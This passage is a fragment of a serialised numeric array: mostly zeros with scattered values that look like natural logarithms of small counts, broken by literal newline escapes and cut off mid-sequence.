0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 5.991464547107983, 0.0, \n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 5.030437921392435, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 1.7412592803704001, 2.8398715690385097, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 5.346437018291705, 0.0, 0.0, 0.0, \n 1.6094379124341003, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0,\n 0, 0, 0, 0.0, 1.0986122886681098, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.6931471805599453, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0, 0.0, 0.6931471805599453, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, \n 0.6931471805599453, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 1.3862943611198906,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.6931471805599453, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.6931471805599453, 1.6094379124341003, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 1.3862943611198906, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 5.278114659230517, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 